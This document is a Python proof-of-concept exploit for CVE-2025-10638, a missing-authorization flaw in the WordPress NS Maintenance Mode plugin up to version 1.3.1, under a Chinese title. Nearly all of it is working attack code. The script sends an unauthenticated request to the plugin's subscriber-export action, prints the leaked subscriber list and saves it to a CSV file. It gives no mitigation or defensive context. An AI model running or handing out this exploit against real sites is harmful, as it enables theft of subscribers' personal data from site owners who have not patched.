CVE-2025-10638 WordPress NS Maintenance Mode插件未授权访问漏洞

# CVE-2025-10638 - NS Maintenance Mode for WP Unauthenticated Subscriber Export PoC # Affected: NS Maintenance Mode for WP plugin <= 1.3.1 # Author: Security Researcher # Description: Exploits missing authorization in subscriber export function import requests import sys # Target WordPress site URL TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" # The subscriber export endpoint (typical WordPress admin-ajax.php or plugin-specific endpoint) EXPORT_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Action parameter for the subscriber export function # The plugin's export function lacks proper capability checks PAYLOAD = { "action": "ns_maintenance_mode_export_subscribers" } def exploit(url): """ Exploit the missing authorization vulnerability to dump subscriber list. No authentication required - works against unauthenticated attackers. """ print(f"[*] Targeting: {url}") print(f"[*] Sending unauthenticated request to subscriber export endpoint...") try: # Send unauthenticated POST request to trigger the export response = requests.post( EXPORT_ENDPOINT, data=PAYLOAD, timeout=10, allow_redirects=False ) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Vulnerability confirmed! Status: {response.status_code}") print(f"[+] Subscriber data leaked ({len(response.content)} bytes):") print("-" * 60) print(response.text) print("-" * 60) # Save leaked data to file with open("leaked_subscribers.csv", "w") as f: f.write(response.text) print("[+] Data saved to: leaked_subscribers.csv") return True else: print(f"[-] Export failed. Status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-10638 PoC - NS Maintenance Mode Subscriber Export") print("=" * 60) exploit(TARGET_URL)